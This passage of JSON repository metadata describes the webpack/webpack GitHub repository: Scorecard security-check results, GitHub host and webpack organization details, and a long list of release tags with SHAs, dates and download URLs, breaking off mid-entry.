are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/m